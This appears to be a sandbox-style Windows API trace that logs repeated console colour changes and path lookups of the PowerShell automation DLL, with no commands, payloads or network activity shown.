[0086.781] SetConsoleTextAttribute (hConsoleOutput=0x1c3, wAttributes=0x7) returned 1
[0086.783] SetConsoleTextAttribute (hConsoleOutput=0x1cf, wAttributes=0xc) returned 1
[0086.783] SetConsoleTextAttribute (hConsoleOutput=0x1cf, wAttributes=0xc) returned 1
[0086.784] SetConsoleTextAttribute (hConsoleOutput=0x1cf, wAttributes=0x7) returned 1
[0086.785] SetConsoleTextAttribute (hConsoleOutput=0x1cf, wAttributes=0x7) returned 1
[0086.787] SetConsoleTextAttribute (hConsoleOutput=0x1db, wAttributes=0xc) returned 1
[0086.788] SetConsoleTextAttribute (hConsoleOutput=0x1db, wAttributes=0xc) returned 1
[0086.789] SetConsoleTextAttribute (hConsoleOutput=0x1db, wAttributes=0x7) returned 1
[0086.789] SetConsoleTextAttribute (hConsoleOutput=0x1db, wAttributes=0x7) returned 1
[0086.791] SetConsoleTextAttribute (hConsoleOutput=0x1e7, wAttributes=0xc) returned 1
[0086.791] SetConsoleTextAttribute (hConsoleOutput=0x1e7, wAttributes=0xc) returned 1
[0086.792] SetConsoleTextAttribute (hConsoleOutput=0x1e7, wAttributes=0x7) returned 1
[0086.793] SetConsoleTextAttribute (hConsoleOutput=0x1e7, wAttributes=0x7) returned 1
[0086.795] SetConsoleTextAttribute (hConsoleOutput=0x1f3, wAttributes=0xc) returned 1
[0086.795] SetConsoleTextAttribute (hConsoleOutput=0x1f3, wAttributes=0xc) returned 1
[0086.796] SetConsoleTextAttribute (hConsoleOutput=0x1f3, wAttributes=0x7) returned 1
[0086.797] SetConsoleTextAttribute (hConsoleOutput=0x1f3, wAttributes=0x7) returned 1
[0086.799] SetConsoleTextAttribute (hConsoleOutput=0x1ff, wAttributes=0xc) returned 1
[0086.799] SetConsoleTextAttribute (hConsoleOutput=0x1ff, wAttributes=0xc) returned 1
[0086.800] SetConsoleTextAttribute (hConsoleOutput=0x1ff, wAttributes=0x7) returned 1
[0086.801] SetConsoleTextAttribute (hConsoleOutput=0x1ff, wAttributes=0x7) returned 1
[0086.803] SetConsoleTextAttribute (hConsoleOutput=0x20b, wAttributes=0xc) returned 1
[0086.803] SetConsoleTextAttribute (hConsoleOutput=0x20b, wAttributes=0xc) returned 1
[0086.804] SetConsoleTextAttribute (hConsoleOutput=0x20b, wAttributes=0x7) returned 1
[0086.805] SetConsoleTextAttribute (hConsoleOutput=0x20b, wAttributes=0x7) returned 1
[0086.806] SetConsoleTextAttribute (hConsoleOutput=0x217, wAttributes=0xc) returned 1
[0086.807] SetConsoleTextAttribute (hConsoleOutput=0x217, wAttributes=0xc) returned 1
[0086.808] SetConsoleTextAttribute (hConsoleOutput=0x217, wAttributes=0x7) returned 1
[0086.808] SetConsoleTextAttribute (hConsoleOutput=0x217, wAttributes=0x7) returned 1
[0086.810] SetConsoleTextAttribute (hConsoleOutput=0x223, wAttributes=0xc) returned 1
[0086.811] SetConsoleTextAttribute (hConsoleOutput=0x223, wAttributes=0xc) returned 1
[0086.812] SetConsoleTextAttribute (hConsoleOutput=0x223, wAttributes=0x7) returned 1
[0086.812] SetConsoleTextAttribute (hConsoleOutput=0x223, wAttributes=0x7) returned 1
[0086.814] SetConsoleTextAttribute (hConsoleOutput=0x22f, wAttributes=0xc) returned 1
[0086.815] SetConsoleTextAttribute (hConsoleOutput=0x22f, wAttributes=0xc) returned 1
[0086.816] SetConsoleTextAttribute (hConsoleOutput=0x22f, wAttributes=0x7) returned 1
[0086.816] SetConsoleTextAttribute (hConsoleOutput=0x22f, wAttributes=0x7) returned 1
[0086.824] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c81c790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0086.824] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c81c6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0086.824] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c81c6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0086.826] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c818af0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0086.826] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c818a40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0086.826] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c818a40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0086.826] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c818af0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0086.826] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c818a40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0086.827] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c818a40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0086.827] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c818a00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0086.827] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c818a00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0086.828] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c8189b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0086.828] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c818900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0086.828] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c818900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0086.896] SetConsoleTextAttribute (hConsoleOutput=0x243, wAttributes=0xc) returned 1
[0086.896] SetConsoleTextAttribute (hConsoleOutput=0x243, wAttributes=0xc) returned 1
[0086.897] SetConsoleTextAttribute (hConsoleOutput=0x243, wAttributes=0x7) returned 1
[0086.898] SetConsoleTextAttribute (hConsoleOutput=0x243, wAttributes=0x7) returned 1
[0086.900] SetConsoleTextAttribute (hConsoleOutput=0x24f, wAttributes=0xc) returned 1
[0086.901] SetConsoleTextAttribute (hConsoleOutput=0x24f, wAttributes=0xc) returned 1
[0086.902] SetConsoleTextAttribute (hConsoleOutput=0x24f, wAttributes=0x7) returned 1
[0086.902] SetConsoleTextAttribute (hConsoleOutput=0x24f, wAttributes=0x7) returned 1
[0086.904] SetConsoleTextAttribute (hConsoleOutput=0x25b, wAttributes=0xc) returned 1
[0086.904] SetConsoleTextAttribute (hConsoleOutput=0x25b, wAttributes=0xc) returned 1
[0086.906] SetConsoleTextAttribute (hConsoleOutput=0x25b, wAttributes=0x7) returned 1
[0086.906] SetConsoleTextAttribute (hConsoleOutput=0x25b, wAttributes=0x7) returned 1
[0086.908] SetConsoleTextAttribute (hConsoleOutput=0x267, wAttributes=0xc) returned 1
[0086.909] SetConsoleTextAttribute (hConsoleOutput=0x267, wAttributes=0xc) returned 1
[0086.910] SetConsoleTextAttribute (hConsoleOutput=0x267, wAttributes=0x7) returned 1
[0086.910] SetConsoleTextAttribute (hConsoleOutput=0x267, wAttributes=0x7) returned 1
[0086.912] SetConsoleTextAttribute (hConsoleOutput=0x273, wAttributes=0xc) returned 1
[0086.913] SetConsoleTextAttribute (hConsoleOutput=0x273, wAttributes=0xc) returned 1
[0086.914] SetConsoleTextAttribute (hConsoleOutput=0x273, wAttributes=0x7) returned 1
[0086.915] SetConsoleTextAttribute (hConsoleOutput=0x273, wAttributes=0x7) returned 1
[0086.917] SetConsoleTextAttribute (hConsoleOutput=0x27f, wAttributes=0xc) returned 1
[0086.917] SetConsoleTextAttribute (hConsoleOutput=0x27f, wAttributes=0xc) returned 1
[0086.918] SetConsoleTextAttribute (hConsoleOutput=0x27f, wAttributes=0x7) returned 1
[0086.919] SetConsoleTextAttribute (hConsoleOutput=0x27f, wAttributes=0x7) returned 1
[0086.920] SetConsoleTextAttribute (hConsoleOutput=0x28b, wAttributes=0xc) returned 1
[0086.921] SetConsoleTextAttribute (hConsoleOutput=0x28b, wAttributes=0xc) returned 1
[0086.922] SetConsoleTextAttribute (hConsoleOutput=0x28b, wAttributes=0x7) returned 1
[0086.923] SetConsoleTextAttribute (hConsoleOutput=0x28b, wAttributes=0x7) returned 1
[0086.924] SetConsoleTextAttribute (hConsoleOutput=0x297, wAttributes=0xc) returned 1
[0086.925] SetConsoleTextAttribute (hConsoleOutput=0x297, wAttributes=0xc) returned 1
[0086.926] SetConsoleTextAttribute (hConsoleOutput=0x297, wAttributes=0x7) returned 1
[0086.927] SetConsoleTextAttribute (hConsoleOutput=0x297, wAttributes=0x7) returned 1
[0086.929] SetConsoleTextAttribute (hConsoleOutput=0x2a3, wAttributes=0xc) returned 1
[0086.929] SetConsoleTextAttribute (hConsoleOutput=0x2a3, wAttributes=0xc) returned 1
[0086.930] SetConsoleTextAttribute (hConsoleOutput=0x2a3, wAttributes=0x7) returned 1
[0086.931] SetConsoleTextAttribute (hConsoleOutput=0x2a3, wAttributes=0x7) returned 1
[0086.933] SetConsoleTextAttribute (hConsoleOutput=0x2af, wAttributes=0xc) returned 1
[0086.933] SetConsoleTextAttribute (hConsoleOutput=0x2af, wAttributes=0xc) returned 1
[0086.934] SetConsoleTextAttribute (hConsoleOutput=0x2af, wAttributes=0x7) returned 1
[0086.935] SetConsoleTextAttribute (hConsoleOutput=0x2af, wAttributes=0x7) returned 1
[0086.937] SetConsoleTextAttribute (hConsoleOutput=0x2bb, wAttributes=0xc) returned 1
[0086.937] SetConsoleTextAttribute (hConsoleOutput=0x2bb, wAttributes=0xc) returned 1
[0086.938] SetConsoleTextAttribute (hConsoleOutput=0x2bb, wAttributes=0x7) returned 1
[0086.939] SetConsoleTextAttribute (hConsoleOutput=0x2bb, wAttributes=0x7) returned 1
[0086.941] SetConsoleTextAttribute (hConsoleOutput=0x2c7, wAttributes=0xc) returned 1
[0086.941] SetConsoleTextAttribute (hConsoleOutput=0x2c7, wAttributes=0xc) returned 1
[0086.942] SetConsoleTextAttribute (hConsoleOutput=0x2c7, wAttributes=0x7) returned 1
[0086.943] SetConsoleTextAttribute (hConsoleOutput=0x2c7, wAttributes=0x7) returned 1
[0086.945] SetConsoleTextAttribute (hConsoleOutput=0x2d3, wAttributes=0xc) returned 1
[0086.945] SetConsoleTextAttribute (hConsoleOutput=0x2d3, wAttributes=0xc) returned 1
[0086.946] SetConsoleTextAttribute (hConsoleOutput=0x2d3, wAttributes=0x7) returned 1
[0086.947] SetConsoleTextAttribute (hConsoleOutput=0x2d3, wAttributes=0x7) returned 1
[0086.948] SetConsoleTextAttribute (hConsoleOutput=0x2df, wAttributes=0xc) returned 1
[0086.949] SetConsoleTextAttribute (hConsoleOutput=0x2df, wAttributes=0xc) returned 1
[0086.950] SetConsoleTextAttribute (hConsoleOutput=0x2df, wAttributes=0x7) returned 1
[0086.951] SetConsoleTextAttribute (hConsoleOutput=0x2df, wAttributes=0x7) returned 1
[0086.952] SetConsoleTextAttribute (hConsoleOutput=0x2eb, wAttributes=0xc) returned 1
[0086.953] SetConsoleTextAttribute (hConsoleOutput=0x2eb, wAttributes=0xc) returned 1
[0086.954] SetConsoleTextAttribute (hConsoleOutput=0x2eb, wAttributes=0x7) returned 1
[0086.954] SetConsoleTextAttribute (hConsoleOutput=0x2eb, wAttributes=0x7) returned 1
[0086.956] SetConsoleTextAttribute (hConsoleOutput=0x2f7, wAttributes=0xc) returned 1
[0086.957] SetConsoleTextAttribute (hConsoleOutput=0x2f7, wAttributes=0xc) returned 1
[0086.958] SetConsoleTextAttribute (hConsoleOutput=0x2f7, wAttributes=0x7) returned 1
[0086.958] SetConsoleTextAttribute (hConsoleOutput=0x2f7, wAttributes=0x7) returned 1
[0086.960] SetConsoleTextAttribute (hConsoleOutput=0x303, wAttributes=0xc) returned 1
[0086.961] SetConsoleTextAttribute (hConsoleOutput=0x303, wAttributes=0xc) returned 1
[0086.962] SetConsoleTextAttribute (hConsoleOutput=0x303, wAttributes=0x7) returned 1
[0086.962] SetConsoleTextAttribute (hConsoleOutput=0x303, wAttributes=0x7) returned 1
[0086.964] SetConsoleTextAttribute (hConsoleOutput=0x30f, wAttributes=0xc) returned 1
[0086.965] SetConsoleTextAttribute (hConsoleOutput=0x30f, wAttributes=0xc) returned 1
[0086.966] SetConsoleTextAttribute (hConsoleOutput=0x30f, wAttributes=0x7) returned 1
[0086.966] SetConsoleTextAttribute (hConsoleOutput=0x30f, wAttributes=0x7) returned 1
[0086.968] SetConsoleTextAttribute (hConsoleOutput=0x31b, wAttributes=0xc) returned 1
[0086.969] SetConsoleTextAttribute (hConsoleOutput=0x31b, wAttributes=0xc) returned 1
[0086.970] SetConsoleTextAttribute (hConsoleOutput=0x31b, wAttributes=0x7) returned 1
[0086.970] SetConsoleTextAttribute (hConsoleOutput=0x31b, wAttributes=0x7) returned 1
[0086.972] SetConsoleTextAttribute (hConsoleOutput=0x327, wAttributes=0xc) returned 1
[0086.973] SetConsoleTextAttribute (hConsoleOutput=0x327, wAttributes=0xc) returned 1
[0086.974] SetConsoleTextAttribute (hConsoleOutput=0x327, wAttributes=0x7) returned 1
[0086.974] SetConsoleTextAttribute (hConsoleOutput=0x327, wAttributes=0x7) returned 1
[0086.976] SetConsoleTextAttribute (hConsoleOutput=0x333, wAttributes=0xc) returned 1
[0086.977] SetConsoleTextAttribute (hConsoleOutput=0x333, wAttributes=0xc) returned 1
[0086.978] SetConsoleTextAttribute (hConsoleOutput=0x333, wAttributes=0x7) returned 1
[0086.978] SetConsoleTextAttribute (hConsoleOutput=0x333, wAttributes=0x7) returned 1
[0086.980] SetConsoleTextAttribute (hConsoleOutput=0x33f, wAttributes=0xc) returned 1
[0086.981] SetConsoleTextAttribute (hConsoleOutput=0x33f, wAttributes=0xc) returned 1
[0086.982] SetConsoleTextAttribute (hConsoleOutput=0x33f, wAttributes=0x7) returned 1
[0086.982] SetConsoleTextAttribute (hConsoleOutput=0x33f, wAttributes=0x7) returned 1
[0086.983] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c81d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0086.983] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c81d040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0086.984] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c81d040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0086.993] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c81c8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0086.993] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c81c840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0086.993] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c81c840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0086.995] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c818c50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0086.995] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c818ba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0086.995] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c818ba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0086.995] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c818c50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0086.995] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c818ba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0086.995] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c818ba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0086.996] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c818b60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0086.996] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c818b60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0086.996] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c818b10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0086.997] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c818a60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0086.997] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c818a60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0087.065] SetConsoleTextAttribute (hConsoleOutput=0x353, wAttributes=0xc) returned 1
[0087.065] SetConsoleTextAttribute (hConsoleOutput=0x353, wAttributes=0xc) returned 1
[0087.067] SetConsoleTextAttribute (hConsoleOutput=0x353, wAttributes=0x7) returned 1
[0087.067] SetConsoleTextAttribute (hConsoleOutput=0x353, wAttributes=0x7) returned 1
[0087.069] SetConsoleTextAttribute (hConsoleOutput=0x35f, wAttributes=0xc) returned 1
[0087.070] SetConsoleTextAttribute (hConsoleOutput=0x35f, wAttributes=0xc) returned 1
[0087.071] SetConsoleTextAttribute (hConsoleOutput=0x35f, wAttributes=0x7) returned 1
[0087.072] SetConsoleTextAttribute (hConsoleOutput=0x35f, wAttributes=0x7) returned 1
[0087.073] SetConsoleTextAttribute (hConsoleOutput=0x36b, wAttributes=0xc) returned 1
[0087.074] SetConsoleTextAttribute (hConsoleOutput=0x36b, wAttributes=0xc) returned 1
[0087.075] SetConsoleTextAttribute (hConsoleOutput=0x36b, wAttributes=0x7) returned 1
[0087.076] SetConsoleTextAttribute (hConsoleOutput=0x36b, wAttributes=0x7) returned 1
[0087.077] SetConsoleTextAttribute (hConsoleOutput=0x377, wAttributes=0xc) returned 1
[0087.078] SetConsoleTextAttribute (hConsoleOutput=0x377, wAttributes=0xc) returned 1
[0087.079] SetConsoleTextAttribute (hConsoleOutput=0x377, wAttributes=0x7) returned 1
[0087.080] SetConsoleTextAttribute (hConsoleOutput=0x377, wAttributes=0x7) returned 1
[0087.082] SetConsoleTextAttribute (hConsoleOutput=0x383, wAttributes=0xc) returned 1
[0087.082] SetConsoleTextAttribute (hConsoleOutput=0x383, wAttributes=0xc) returned 1
[0087.083] SetConsoleTextAttribute (hConsoleOutput=0x383, wAttributes=0x7) returned 1
[0087.084] SetConsoleTextAttribute (hConsoleOutput=0x383, wAttributes=0x7) returned 1
[0087.086] SetConsoleTextAttribute (hConsoleOutput=0x38f, wAttributes=0xc) returned 1
[0087.087] SetConsoleTextAttribute (hConsoleOutput=0x38f, wAttributes=0xc) returned 1
[0087.088] SetConsoleTextAttribute (hConsoleOutput=0x38f, wAttributes=0x7) returned 1
[0087.088] SetConsoleTextAttribute (hConsoleOutput=0x38f, wAttributes=0x7) returned 1
[0087.090] SetConsoleTextAttribute (hConsoleOutput=0x39b, wAttributes=0xc) returned 1
[0087.091] SetConsoleTextAttribute (hConsoleOutput=0x39b, wAttributes=0xc) returned 1
[0087.092] SetConsoleTextAttribute (hConsoleOutput=0x39b, wAttributes=0x7) returned 1
[0087.092] SetConsoleTextAttribute (hConsoleOutput=0x39b, wAttributes=0x7) returned 1
[0087.094] SetConsoleTextAttribute (hConsoleOutput=0x3a7, wAttributes=0xc) returned 1
[0087.094] SetConsoleTextAttribute (hConsoleOutput=0x3a7, wAttributes=0xc) returned 1
[0087.095] SetConsoleTextAttribute (hConsoleOutput=0x3a7, wAttributes=0x7) returned 1
[0087.096] SetConsoleTextAttribute (hConsoleOutput=0x3a7, wAttributes=0x7) returned 1
[0087.098] SetConsoleTextAttribute (hConsoleOutput=0x3b3, wAttributes=0xc) returned 1
[0087.098] SetConsoleTextAttribute (hConsoleOutput=0x3b3, wAttributes=0xc) returned 1
[0087.100] SetConsoleTextAttribute (hConsoleOutput=0x3b3, wAttributes=0x7) returned 1
[0087.100] SetConsoleTextAttribute (hConsoleOutput=0x3b3, wAttributes=0x7) returned 1
[0087.102] SetConsoleTextAttribute (hConsoleOutput=0x3bf, wAttributes=0xc) returned 1
[0087.102] SetConsoleTextAttribute (hConsoleOutput=0x3bf, wAttributes=0xc) returned 1
[0087.103] SetConsoleTextAttribute (hConsoleOutput=0x3bf, wAttributes=0x7) returned 1
[0087.104] SetConsoleTextAttribute (hConsoleOutput=0x3bf, wAttributes=0x7) returned 1
[0087.106] SetConsoleTextAttribute (hConsoleOutput=0x3cb, wAttributes=0xc) returned 1
[0087.106] SetConsoleTextAttribute (hConsoleOutput=0x3cb, wAttributes=0xc) returned 1
[0087.108] SetConsoleTextAttribute (hConsoleOutput=0x3cb, wAttributes=0x7) returned 1
[0087.108] SetConsoleTextAttribute (hConsoleOutput=0x3cb, wAttributes=0x7) returned 1
